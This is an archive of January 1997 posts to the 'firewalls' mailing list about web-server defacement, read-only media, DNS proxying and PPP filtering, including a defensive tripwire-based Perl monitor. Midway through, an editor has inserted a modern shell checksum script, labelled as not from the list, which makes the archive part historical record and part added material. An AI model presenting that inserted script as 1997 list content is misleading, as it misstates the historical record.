Jim truitt From firewalls-owner Wed Jan 1 14:03:36 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA14183 for firewalls-outgoing; Wed, 1 Jan 1997 13:48:16 -0800 (PST) Received: from diablo.cisco.com (diablo.cisco.com [171.68.223.106]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id NAA14173 for ; Wed, 1 Jan 1997 13:48:09 -0800 (PST) Received: from clonvick-pc.cisco.com (c1robo14.cisco.com [171.68.13.14]) by diablo.cisco.com (8.8.4/CISCO.SERVER.1.2) with SMTP id NAA08670; Wed, 1 Jan 1997 13:44:23 -0800 (PST) Message-Id: <2.2.32.19970101213404.0075d8bc@diablo.cisco.com> X-Sender: clonvick@diablo.cisco.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 01 Jan 1997 15:34:04 -0600 To: Thomas Leitner , Paul Ferguson From: Chris Lonvick Subject: Re: Air Force Web Site Hacked Cc: Mark Johnson , Gene Lee , Dale Drew , Michael Idengren , "firewalls@GreatCircle.COM" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, There have been several interesting solutions offered here to address the Web server hacking problem. The ones I've seen seem to focus on either making the content static, or on providing secure methods of updating the content from a more secured machine further within the organization. This may work well enough for organizations which are providing the content in a "one way" method: _from_ the organization _to_ the surfers. However, this doesn't appear to be the model for the future development of the Web/Internet. From marketing blabs and magazine articles, it appears that the largest driver of bi-directional content exchange is going to be electronic transactions. For those companies which aren't planning on doing this anytime soon, I still think that they would want to get "feedback" (aka - demographics research) from people visiting their site. 
I, personally, would like to get a transaction record onto a non-volatile media pretty quickly. I'd say that setting up a Web server on the Internet is not something that you can do, and then just walk away from. You must accept the responsibility of constantly maintaining security on exposed systems like these. I can't offer anything more than to say that the traditional security methods, which have also been mentioned here, are probably the best. Thanks, Chris Lonvick Cisco Systems Consulting Engineering Houston, TX, USA +1-713-778-5663 At 02:59 PM 1/1/97 +0100, Thomas Leitner wrote: > >On Tue, 31 Dec 1996, Paul Ferguson wrote: > >> Frankly, I think the suggestion of using non-writable media (ie. CD-ROMs) >> is rather unpractical. Most sufficiently interesting web sites contain >> ever-changing & constantly updated information, such as news, various >> daily features, etc. >> >> Not a practical solution. > >O.K. If you want to be really secure and still updateable, do this: > >1.) Use two mirrored disks. One is mounted read-only one is mounted > read/write. The two disks can contain not only the WEB data but > the whole operating system as well. As someone already noted > before: Linux (and I'm sure other Unixes as well) can be setup > to run from an RO media. > >2.) When updates are required: Mount the second mirror disk r/w, > do the update and reboot from the second mirror disk which is > now mounted read-only. If the system is setup properly, > the reboot time and thus the outage time can be kept quite low. > >3.) When the system comes up, mount the first disk RW and apply > the updates as well to keep the disk contents in sync. > >If the outage during the update is unacceptable what about using >two mirror machines: One standby and RW for updates and one >on-line running RO. After the update, machines could swap their >functions immediately. Sure: This would require some fancy IP >address setup. 
> >Tom > >-------------------------------------------------------------------------- >T o m L e i t n e r Dept. of Communications > Graz University of Technology, >e-mail : tom@finwds01.tu-graz.ac.at Inffeldgasse 12 >Phone : +43-316-873-7455 A-8010 Graz / Austria / Europe >Fax : +43-316-463-697 >Home page : http://wiis.tu-graz.ac.at/people/tom.html >PGP public key on : ftp://wiis.tu-graz.ac.at/pgp-keys/tom.asc or send >mail with subject "get Thomas Leitner" to pgp-public-keys@keys.pgp.net >-------------------------------------------------------------------------- > > > From firewalls-owner Wed Jan 1 14:14:18 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA15101 for firewalls-outgoing; Wed, 1 Jan 1997 14:09:30 -0800 (PST) Received: from reflections.mindspring.com (reflections.mindspring.com [204.180.142.192]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id OAA15084 for ; Wed, 1 Jan 1997 14:09:19 -0800 (PST) Received: from localhost (lists@localhost) by reflections.mindspring.com (8.7.1/8.7.1) with SMTP id RAA10674; Wed, 1 Jan 1997 17:06:07 -0500 Date: Wed, 1 Jan 1997 17:06:06 -0500 (EST) From: Todd Graham Lewis To: Marc Goldburg cc: Firewalls Mailing List Subject: Re: packet filtering on PPP interfaces In-Reply-To: <199612242018.MAA15154@array.arraycomm.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 24 Dec 1996, Marc Goldburg wrote: > We're planning to use a Sparc 20 with an attached modem pool as a dialup > ppp server for our telecommuters. Seems overkill to me; why not a $1k x86 box? > Is anyone aware of ppp implementation that include packet filtering? Or of > (nit-based?) packet filtering implementations that could be applied to a > ppp interface under Solaris 1 (Solaris 1.2 to be exact)? In a former job, I used Morningstar's PPP implementation for Solaris, and it was very good. 
It included ACLs of the type you describe. I'm not sure whether it's still available in general, or for Solaris 1 (ick!) in particular. __ Todd Graham Lewis Linux! Core Engineering Mindspring Enterprises tlewis@mindspring.com (800) 719 4664, x2804 From firewalls-owner Wed Jan 1 14:28:59 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA14602 for firewalls-outgoing; Wed, 1 Jan 1997 14:01:44 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id OAA14595 for ; Wed, 1 Jan 1997 14:01:37 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-961106) id OAA17276; Wed, 1 Jan 1997 14:00:17 -0800 Received: from nsco.network.com(129.191.1.1) by mycroft via smap (V1.3mjr) id sma017264; Wed Jan 1 13:54:50 1997 Received: from mnbp.network.com (ushub.network.com) by nsco.network.com (4.1/1.34) id AA14630; Wed, 1 Jan 97 15:59:16 CST Received: by mnbp.network.com with Microsoft Mail id <32CADC14@mnbp.network.com>; Wed, 01 Jan 97 15:50:12 CST From: Craig McLellan To: Dale Drew , Mark Johnson Cc: Christopher Klaus , firewalls , Michael Idengren Subject: RE: WWW Gaffiti Immunity (Off Topic) Date: Wed, 01 Jan 97 15:49:00 CST Message-Id: <32CADC14@mnbp.network.com> X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Why not just buy a tool such as web stalker from Haystack ??? RGRDS....clm ---------- From: firewalls-owner To: Mark Johnson; Dale Drew Cc: Michael Idengren; Christopher Klaus; firewalls Subject: WWW Gaffiti Immunity (Off Topic) Date: December 31, 1996 14:57 >> I don't see how CDROM provides significant advantages on a WEB server >> "graffiti" attack. In order to avoid graffiti try something like this: 1)Write a program that checks the size/date of the WWW directory If it fails have it Kill the WWW server and send email to the admin. 
2)Setup a CRON job to run the program every 15 min.

If a hacker is good enough they will find it, but who would be looking for such a random thing? Just make sure you change the size whenever you make a change to your documents.

As for CD-ROM WWW sites, I believe the term "Link-rot" comes to mind.

Good Luck,
Brad

Providing The Power Of Operable Networks
Brad Daugherty - Associate Network Systems Engineer
PHONE:(630)942-5770 PAGE:(800)467-1467 FAX:(630)545-0068
Lifetime:

From firewalls-owner Wed Jan 1 14:50:43 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA16050 for firewalls-outgoing; Wed, 1 Jan 1997 14:29:53 -0800 (PST)
Received: from ian.south-border.com (ian.mnsinc.com [206.239.152.197]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id OAA16013 for ; Wed, 1 Jan 1997 14:29:33 -0800 (PST)
Received: (qmail 6547 invoked from network); 1 Jan 1997 22:28:56 -0000
Received: from sparc.south-border.com (128.26.242.90) by sunspot-thin.south-border.com with SMTP; 1 Jan 1997 22:28:56 -0000
Received: from sparc.south-border.com (localhost [127.0.0.1]) by sparc.south-border.com (8.8.4/8.8.4) with ESMTP id RAA02629; Wed, 1 Jan 1997 17:28:53 -0500 (EST)
Message-Id: <199701012228.RAA02629@sparc.south-border.com>
To: firewalls@GreatCircle.COM
cc: Brad Daugherty , Mark Johnson , Dale Drew , Michael Idengren , Christopher Klaus
Subject: Re: WWW Gaffiti Immunity (Off Topic)
In-reply-to: Your message of "Wed, 01 Jan 1997 09:35:47 EST." <199701011435.JAA01074@sparc.south-border.com>
Date: Wed, 01 Jan 1997 17:28:52 -0500
From: The Unseen
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Corrected an obvious error... 8-) here's the latest one. Please let me know if you find other errors....

Ian

--------------

#!/usr/local/bin/perl
#
# The purpose of this script is to help secure our WWW files
# from graffiti. We are going to use tripwire to help us keep
# track of file signatures and alert us when there are major
# inconsistencies that may result from someone trying to hack
# our site.
#
# Ideal config consists of a WWW server mounting via NFS the
# document tree. This script is intended to be run on the
# NFS server.
#
# Feel free to distribute and/or alter this script as needed.
# But be kind and email me the changes... ian@south-border.com

package WWWcheck;

$Alert=0;
@SendData=();
$DoBoth=0;
$DoNFS=0;
$DoRmHttp=0;

# Specify the email address of the admin you want information
# mailed to.
$AdminUser="securityuser";

# Specify the method of emailing.
$SendmailCMD="/usr/lib/sendmail -t";

# The following variables define where tripwire is. Specify
# the correct database and config files to be given to tripwire
# as options. Tripwire will run in quiet mode to eliminate
# pass babble.
$TripCMD="/place/to/bin/tripwire";
$TripDatabase="/place/to/tripwire/www.database";
$TripConfigFile="/place/to/tripwire/WWW.conf";

# If your WWW server mounts its document tree via NFS from
# a hardened server and this script and tripwire run on the
# NFS server, set DoNFSshare to 1. This will unshare the NFS
# directory after a grace period defined below.
$DoNFSshare=1;
$NFSunsharecmd="/usr/sbin/unshare";
$NFSwwwdir="/place/to/real/NFS/server/WWW";

# Change this to 1 to kill the httpd server remotely based on
# the outcome of tripwire. Be sure to review RemoteHttpKill,
# RemoteHost, and RemoteCMD. I like ssh because of the key
# exchange.
$DoRemoteKill=0;

# These are used when DoRemoteKill is set to 1
$RemoteCMD="/opt/PUBsshd/bin/ssh";
$RemoteHost="WWW";
$RemoteHttpKill="/etc/init.d/httpd stop";

# This defines how long to wait gracefully before proceeding
# with killing the httpd server and NFS server.
$SleepTime="sleep 3600";

#<----you do not need to change anything below here--->

# Issue tripwire command with options. Compile a list of
# changes that have occurred from the last update of the
# tripwire database. Save these modifications to be sent
# as a notification to the admin.
sub BuildTripDatabase {
    open(Tripdata,"$TripCMD -d $TripDatabase -c $TripConfigFile -q|")
        || die "cannot run $TripCMD: $!\n";
    while(<Tripdata>) {
        chop;
        push(@SendData,$_);
    }
    close(Tripdata);
}

# Mail the tripwire output to the admin together with a description
# of the action that will follow. Sets the flags PerformKill acts on.
sub AlertAdmin {
    # No differences reported: nothing to do.
    if(@SendData == 0) {
        return;
    }
    open(ALERT,"|$SendmailCMD") || die "cannot run $SendmailCMD: $!\n";
    print ALERT "To:$AdminUser\n";
    print ALERT "cc:\n";
    print ALERT "subject: WWW server Document tree\n";
    print ALERT "-------\n";
    print ALERT "Has changed since the last tripwire database update. Here\n";
    print ALERT "is a summary of the output from tripwire run at \n\n\n";
    for(@SendData) {
        print ALERT "$_\n";
    }
    print ALERT "\nThe following actions will be taken...\n\n";
    if($DoNFSshare == 1 && $DoRemoteKill == 1) {
        print ALERT "Your WWW server mounts its document tree via NFS from\n";
        print ALERT "this server and you have elected to kill the remote httpd\n";
        print ALERT "daemon running on the WWW server. The following command will be\n";
        print ALERT "issued:\n\n";
        print ALERT "$SleepTime ; $NFSunsharecmd $NFSwwwdir ; $RemoteCMD $RemoteHost '($RemoteHttpKill)'\n\n";
        close(ALERT);
        $DoBoth=1;
        return;
    }
    if($DoNFSshare == 1) {
        print ALERT "Your WWW server is mounting its document tree via an NFS\n";
        print ALERT "server which is this host according to variables set. The\n";
        print ALERT "following command will be issued:\n\n";
        print ALERT "$SleepTime ; $NFSunsharecmd $NFSwwwdir\n\n";
        $DoNFS=1;
    }
    if($DoRemoteKill == 1) {
        print ALERT "According to our options you have elected to disable httpd\n";
        print ALERT "service on the WWW server. The following command will be\n";
        print ALERT "issued:\n\n";
        print ALERT "$RemoteCMD $RemoteHost '($SleepTime ; $RemoteHttpKill)'\n\n";
        $DoRmHttp=1;
    }
    if($DoNFSshare == 0 && $DoRemoteKill == 0) {
        print ALERT "Although we have detected differences that may indicate an\n";
        print ALERT "attack, options set tell us that we are to take no action\n";
        print ALERT "in response. YOU MUST CHECK to see if this is really the\n";
        print ALERT "intended reaction to the tripwire output!\n\n";
    }
    close(ALERT);
}

# Carry out whatever AlertAdmin announced, after the grace period.
sub PerformKill {
    if($DoBoth) {
        print STDERR `$SleepTime ; $NFSunsharecmd $NFSwwwdir ; $RemoteCMD $RemoteHost '($RemoteHttpKill)'`;
        return;
    }
    if($DoNFS) {
        print STDERR `$SleepTime ; $NFSunsharecmd $NFSwwwdir`;
    }
    if($DoRmHttp) {
        print STDERR `$SleepTime ; $RemoteCMD $RemoteHost '($RemoteHttpKill)'`;
    }
}

sub main {
    &BuildTripDatabase();
    &AlertAdmin();
    &PerformKill();
}

package main;

WWWcheck::main();

From firewalls-owner Wed Jan 1 16:13:52 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA24273 for firewalls-outgoing; Wed, 1 Jan 1997 16:09:42 -0800 (PST)
Received: from reflections.mindspring.com (reflections.mindspring.com [204.180.142.192]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id QAA24263 for ; Wed, 1 Jan 1997 16:09:35 -0800 (PST)
Received: from localhost (lists@localhost) by reflections.mindspring.com (8.7.1/8.7.1) with SMTP id TAA11101; Wed, 1 Jan 1997 19:06:26 -0500
Date: Wed, 1 Jan 1997 19:06:25 -0500 (EST)
From: Todd Graham Lewis
To: Robert Hanson
cc: Firewall Mailing List
Subject: Re: Christopher Klaus and ISS
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Tue, 31 Dec 1996, Robert Hanson wrote:

> no disrespect intended to you Todd, yet....
>
> kill! maim! shoot! my goodness... we are all capitalist pigs... what
> makes anyone better than anyone else standing next to them...
I not only like corporations, I work for one. Believe it or not, I don't even have a problem with vendors discussing their products on the list. Those who offer help to newbies, contribute to technical discussions, etc., are more than entitled to mention once in a while "BTW (disclaimer: I work for 'em), our product X is designed to address this problem", or even to say "In light of the discussion last month, I thought that the list might be interested in our new product, SuperBlammo4000." What I don't appreciate are bone-headed sales pitches coming from people who never participate in the discussions on the list, and whose sole purpose is to use the list as a free advertising channel. I don't think that this is too far off the mark, and the fact that Klaus is a complete asshole just makes the decision that much easier. (BTW, I'm sorry I wasn't able to participate in the discussion about Linux firewalls. I was visiting family during the holidays.) __ Todd Graham Lewis Linux! Core Engineering Mindspring Enterprises tlewis@mindspring.com (800) 719 4664, x2804 From firewalls-owner Wed Jan 1 20:58:57 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id UAA04833 for firewalls-outgoing; Wed, 1 Jan 1997 20:51:23 -0800 (PST) Received: from kic.or.jp (server.kic.or.jp [202.239.136.13]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id UAA04798 for ; Wed, 1 Jan 1997 20:51:13 -0800 (PST) Received: from ppp74.kic.or.jp (ppp74.kic.or.jp [202.239.136.94]) by kic.or.jp with SMTP id NAA06408; Thu, 2 Jan 1997 13:43:00 +0900 Received: by ppp74.kic.or.jp with Microsoft Mail id <01BBF8B3.E469E440@ppp74.kic.or.jp>; Thu, 2 Jan 1997 13:50:19 +0900 Message-ID: <01BBF8B3.E469E440@ppp74.kic.or.jp> From: "Jason T. 
Luttgens" To: "firewalls@greatcircle.com" , "'Norm Laudermilch'" Subject: RE: Air Force Web Site Hacked Date: Thu, 2 Jan 1997 13:50:18 +0900 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Why not get Practical Unix and Internet Security from O'Reilly and do what is says. I bet if everyone disabled stupid services (on unix hosts), installed TCP wrappers to allow telnets from limited IP addresses, did Cisco's recommendations on preventing IP spoofing, used Linux or another free x86 Unix and ssh to telnet in, and subscribed to security mailing lists to keep up on things, these incidents would slow down a LOT...how many people out there have done this to their unix host?? Get to work you system admins! All this is your fault...... ---------- From: Norm Laudermilch[SMTP:norm@UU.NET] Sent: Wednesday, January 01, 1997 8:57 AM To: firewalls@greatcircle.com Subject: Re: Air Force Web Site Hacked [from Michael Idengren:] > I don't know about the rest of you but I agree with the idea of putting a > webserver on a CD-ROM. [from Thomas Leitner:] > why not just put it on a separate disk which is mounted > read-only? [from Dale Drew:] > Using a CDROM web-server doesn't provide resistance to an > attacker who gains access to the system as ROOT... Keep in mind that this entire thread assumes that the attacker will *not* take an easier approach, such as compromising the DNS records that point to the server. In this case, the attacker can create any web content they like, spend all the time in the world creating it, and then quickly convince the DNS servers that www.foo.com now resolves to the new (fake) address. Securing your www server is just a first (although important) step. I do think read-only media is an interesting idea, by the way :) Dale is right though, there are still vulnerabilities. Personally, I like the idea of marking the files immutable myself. 
This way, even root can't change the content unless the machine is brought down into single-user mode. Not sure how many other operating systems support this other than (the great) BSDI though. Happy new year (2 minutes to go...), Norm ---------------------------------------------------------------------- Have you cleaned your packet filter lately? - Josh Osborne ---------------------------------------------------------------------- Norm Laudermilch E-mail: norm@uu.net Manager, Information Security Phone: 703-206-5952 UUNET Technologies, Inc. 3060 Williams Drive Fairfax, VA 22031-4648 ---------------------------------------------------------------------- From firewalls-owner Thu Jan 2 00:14:13 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id AAA12383 for firewalls-outgoing; Thu, 2 Jan 1997 00:04:46 -0800 (PST) Received: from dtcro002.apogee-com.fr (firewall.apogee-com.fr [194.2.187.130]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id AAA12376 for ; Thu, 2 Jan 1997 00:04:38 -0800 (PST) Received: by dtcro002.apogee-com.fr; id JAA03427; Thu, 2 Jan 1997 09:04:50 +0100 (MET) Received: from dtcxs001.apogee-com.fr(10.129.16.1) by firewall.apogee-com.fr via smap (3.2) id xma003425; Thu, 2 Jan 97 09:04:41 +0100 Received: from ingpc001.apogee-com.fr by (4.1/SMI-4.1) id AA18713; Thu, 2 Jan 97 09:02:03 +0100 Message-Id: <3.0.32.19970102090259.006f63d8@apogee1.apogee-com.fr> X-Sender: jfzw@apogee1.apogee-com.fr X-Mailer: Windows Eudora Pro Version 3.0 Demo (32) Date: Thu, 02 Jan 1997 09:03:03 +0100 To: "R. McMahon" , firewalls@GreatCircle.COM From: Jean-Francois ZWOBADA Subject: Re: DNS Proxy and Internal Root Name Server Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 16:59 31/12/1996 -0500, R. 
McMahon wrote: >Background: >I am looking at setting up a DNS proxy using "forwarders" and "slave" >lines in by /etc/named.boot file as described in the "Building >Firewalls" and "DNS and BIND" books by O'Reilly. However, I want to do >this where I can maintain an internal Root name server. For resolution >of domain names outside the internal top-level domains, I would like the >proxy name server (which will have an "external" domain name) be the >only name server queried by the internal root name server and having >this proxy be the only host to query external name servers. (I would >set up UDP port 53 filtering on the router.) > >Problem: >One problem I thought of concerns the mitigation between the internal >root name server and the forwarders/slave lines. If a subordinate >domain name server queries the root name server for an "outside" domain, >how would it know to forward the query to the proxy (being that it is a >internal root name server)? I could have my subordinate top-level >domain name serves query the proxy directly by putting forwarders line >in it's /etc/named.boot, however, this would bypass the internal root >structure. It seems to be straight forward w/o an internal root name >server, however, I need to maintain these root name server. Can anyone >help. > >Thanks, > >rwm > The problem with an internal root server is that it wont take any account of your forwarders & slave options because it is said to be a root server. The only solution I think of is adding the noforward patch in the named daemons of the first level name servers you have under your root server. You just have to specify all the domains known by your internal root nameserver so that your lower level nameserver would query it but would forward to your proxy for everything else. Hope this helps Jean-Francois PS: the noforward patch is available for BIND on ftp.vix.com (but I can't remember the path...) 
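Returning to the defacement-detection thread earlier on this page (Brad Daugherty's suggestion of a cron job that checks the document tree and kills the server, and Ian's tripwire wrapper above): the following is an added example written for this edit, not code posted to the list. It records a baseline of checksums for a document tree, re-checks the tree later, and shows the cron entry point that mails a report and stops the server when something differs. It uses only POSIX tools (find, cksum, sort, comm, mktemp). The sendmail path, the httpd init script, the crontab line, the document root and the admin address are all assumptions.

```shell
#!/bin/sh
# Added example (not from the list thread): baseline/verify check for a
# web document tree. Run it on the hardened host that owns the tree and
# keep the baseline file OUTSIDE the tree it describes, unwritable by the
# web server's user.

# Snapshot: one "crc size ./path" line per regular file under $1, sorted in
# the C locale so that comm(1) below sees consistently ordered input.
wwwcheck_snapshot() {
    (cd "$1" && find . -type f -exec cksum {} + | LC_ALL=C sort)
}

# Record the trusted state of tree $1 into baseline file $2.
# Re-run this deliberately after every legitimate content update.
wwwcheck_baseline() {
    wwwcheck_snapshot "$1" > "$2"
}

# Compare tree $1 against baseline $2. Prints nothing and returns 0 when
# they match; otherwise prints the baseline entries that are gone ("was:")
# and the current entries that are new ("now:") and returns 1. A modified
# file appears under both headings, a deleted file only under "was:", an
# added file only under "now:".
wwwcheck_verify() {
    tmp=$(mktemp) || return 2
    wwwcheck_snapshot "$1" > "$tmp"
    was=$(LC_ALL=C comm -23 "$2" "$tmp")
    now=$(LC_ALL=C comm -13 "$2" "$tmp")
    rm -f "$tmp"
    if [ -z "$was" ] && [ -z "$now" ]; then
        return 0
    fi
    [ -n "$was" ] && printf '%s\n' "$was" | sed 's/^/was: /'
    [ -n "$now" ] && printf '%s\n' "$now" | sed 's/^/now: /'
    return 1
}

# Reaction commands for the cron entry point. Both defaults are assumed
# paths; override them from the environment to fit the host.
: "${WWWCHECK_MAIL_CMD:=/usr/lib/sendmail -t}"
: "${WWWCHECK_STOP_CMD:=/etc/init.d/httpd stop}"

# Cron entry point: $1 = document root, $2 = baseline, $3 = admin address.
# Returns 0 when the tree is unchanged; otherwise mails the report, stops
# the server and returns 1. A verify failure (e.g. mktemp) is treated the
# same way, so the check fails closed. Assumed crontab line, every 15 min:
#   */15 * * * * /usr/local/sbin/wwwcheck /export/www /var/wwwcheck/baseline security@example.com
wwwcheck_run() {
    report=$(wwwcheck_verify "$1" "$2") && return 0
    {
        printf 'To: %s\nSubject: WWW document tree on %s has changed\n\n' "$3" "$(uname -n)"
        printf '%s\n\nStopping httpd; inspect the tree and rebuild the baseline once it is clean.\n' "$report"
    } | $WWWCHECK_MAIL_CMD
    $WWWCHECK_STOP_CMD
    return 1
}
```

cksum is a CRC, not a cryptographic digest: it catches accidental and casual changes, but an attacker who knows the check is in place can craft a replacement with the same CRC and size, which is why tripwire records cryptographic signatures instead. The other point the thread makes still applies: the baseline and this script must live where the web server cannot write them, or an intruder with write access to the tree simply regenerates the baseline.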
From firewalls-owner Thu Jan 2 04:59:19 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA22479 for firewalls-outgoing; Thu, 2 Jan 1997 04:49:52 -0800 (PST) Received: from smtpgw.adtdata.com (smtpgw.adtdata.com [204.183.205.252]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id EAA22465 for ; Thu, 2 Jan 1997 04:49:42 -0800 (PST) Received: from ADT-Message_Server by smtpgw.adtdata.com with Novell_GroupWise; Thu, 02 Jan 1997 07:50:48 -0500 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Wed, 01 Jan 1997 15:10:33 -0500 From: Brian Stone To: mark@hercules.reno.nv.us, genel@inforamp.net, ddrew@mci.net Cc: firewalls@GreatCircle.COM, cklaus@iss.net, midengre@stetson.edu Subject: RE: Air Force Web Site Hacked -Reply Mime-Version: 1.0 Content-Type: text/plain Content-Disposition: inline Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Compaq Corp. provides a bootable "Smart Start" OS installation CD with every Proliant 5000 (many people are using these as Netware/IntranetWare or NT file/print/app/web servers). I'm not sure how they do it, I believe its a function of the BIOS that "knows" about the CD as a bootable media (probably searches A:, C:, D: etc. for boot files) if nothing is in A: and the hard disk isn't partioned/formatted yet it boots from the CD and steps you through installing the rest of the drivers (hard drive/NIC/etc.) and the OS you purchased! It's cool and I think they've been doing it for awhile. Brian Stone bstone@KnowledgeSoft.com >>> Gene Lee 12/31/96 04:00pm >>> On Tuesday, December 31, 1996 2:41 PM, Mark Johnson[SMTP:mark@hercules.reno.nv.us] wrote: >I have not set one up yet(Planned for July), but I believe you can have >a totally CDROM machine, at least using Novell or NT. Bootable CDROMs >and all data on CDROM so you would not have any writable media. > >Can anyone confirm of deny my thoughts? 
Slackware Linux has a useable filesystem on CD-ROM, however the boot partition still has to be HD or Floppy. One thing that puzzles me about bootable media is if you have a bootable CD, how does it install the drivers for itself to read from the CD to actually start reading the boot sector (which supposedly is on the CD). Kind of a Catch-22. Forgive me, but I'm no PC guru...

--
Gene Lee
genel@inforamp.net
genelee@vnet.ibm.com

From firewalls-owner Thu Jan 2 05:19:44 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA23064 for firewalls-outgoing; Thu, 2 Jan 1997 05:07:24 -0800 (PST)
Received: from ns.sbbs.se (ns.sbbs.se [194.16.248.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id FAA23057 for ; Thu, 2 Jan 1997 05:07:09 -0800 (PST)
Received: from ns.sbbs.se by ns.sbbs.se (NTMail 3.02.09) with ESMTP id ha135519 for ; Thu, 2 Jan 1997 14:06:43 +0100
Received: by ppp67.sbbs.se with Microsoft Mail id <01BBF8B5.F541F490@ppp67.sbbs.se>; Thu, 2 Jan 1997 14:05:07 +0100
Message-ID: <01BBF8B5.F541F490@ppp67.sbbs.se>
From: Sebastian Stache
To: "'Firewalls@GreatCircle.COM'"
Subject: Re: Air Force Web Site Hacked
Date: Thu, 2 Jan 1997 14:04:14 +0100
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="---- =_NextPart_000_01BBF8B5.F54501D0"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I'm getting unnerved by the fact that not only have those sites indeed been hacked, but no one seems to be surprised. What techniques were used? To alter the html files, someone obviously managed to achieve file overwrite rights (at the very least). If I ran a military/intelligence site for the public, I would think it natural to use a dedicated webserver, with only the servers required to make maintenance feasible running (ie no smtp, telnet etc). Also, I could think of no reasons to allow anything but html sessions from the outside (since it was dedicated).

The level of security problems is often the inverse of the level of flexibility and functionality. In this case it seems to me that the flexibility/functionality can be reduced to a point of mere viewing services, which is why it would be possible to put the files on cdrom (which by the way doesn't help at all if the hacker has gained root access since he can simply point to another location).

So, did the hacked hosts have ftp daemons running, with the firewall allowing outside access? Telnet? Rsh? Or are there html specific inherent weaknesses (even without java etc)?

Regards
Sebastian Stache
Lund, Sweden

From firewalls-owner Thu Jan 2 06:29:13 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA27841 for firewalls-outgoing; Thu, 2 Jan 1997 06:23:53 -0800 (PST)
Received: from smartwall.v-one.com (smartwall.v-one.com [206.205.89.11]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with
From: Peg McMahan
To: Sebastian Stache, Firewalls@GreatCircle.COM
Subject: Re: Air Force Web Site Hacked
Date: Thu, 02 Jan 1997 09:18:37 -0500

> So, did the hacked hosts have ftp daemons
> running, with the firewall allowing outside
> access? Telnet? Rsh? Or are there html
> specific inherent weaknesses (even without
> java etc)?

Yes. It's called cgi-bin. (To mention just one of the many inherent httpd problems.... and cgi is my favourite to pick on.)

____________________________________________________________________
Margaret H. McMahan - Systems Engineer
pmcmahan@v-one.com
"Know your faults, know your friends, Be prepared to take revenge"

From: Markus Hübner
Organization: NET Design
To: firewalls@greatcircle.com
Subject: Security & Hackerscene site
Date: Thu, 02 Jan 1997 15:30:09 +0100

During the last days the site "Security & Hackerscene" has been expanded. New sections specialized in intrusion detection, IP-spoofing, ... will help you to protect your site from break-ins and will give you an insight into the latest methods and tricks used by hackers to break into obviously secure computers. Furthermore many CERT advisories and other security related text files were redesigned and are now available in HTML format. You will also find links to the best information resources (files, e-zines, texts) on the net regarding Internet-Security.
URL of the "Security & Hackerscene" site:
--------------------------------------------------------------
http://www.geocities.com/capecanaveral/3498/security.htm
--------------------------------------------------------------

Some of the items you will find:

+ IP-spoofing demystified
+ Intrusion Detection Checklist
+ CGI Security Holes
+ How hackers cover their tracks
+ Compromise FAQ
+ Protecting Yourself from Password File Attacks
+ The Ultimate Sendmail Hole List
+ An Architectural Overview of UNIX Network Security
+ Essential Security Information
+ UNIX Backdoors
+ UNIX System Security Issues
+ Tips for Improving Your Security
+ as well as files commonly found in the underground scene.

I would be glad to receive your feedback.

Markus Hübner
======================================================================
E-Mail: matic@bau2.uibk.ac.at
WWW: http://bau2.uibk.ac.at/matic
Working as a freelance WEB-programmer and security-consultant.

From: long-morrow@CS.YALE.EDU
To: bstone@smtpgw.adtdata.com, ddrew@mci.net, genel@inforamp.net, mark@hercules.reno.nv.us
Cc: cklaus@iss.net, firewalls@GreatCircle.COM, midengre@stetson.edu
Subject: RE: Air Force Web Site Hacked -Reply
Date: Thu, 2 Jan 1997 10:20:42 -0500 (EST)
Gene Lee wrote:

> Slackware Linux has a usable filesystem on CD-ROM, however the boot
> partition still has to be HD or Floppy. One thing that puzzles me about
> bootable media is if you have a bootable CD, how does it install the
> drivers for itself to read from the CD to actually start reading the boot
> sector (which supposedly is on the CD). Kind of a Catch-22. Forgive me,
> but I'm no PC guru...

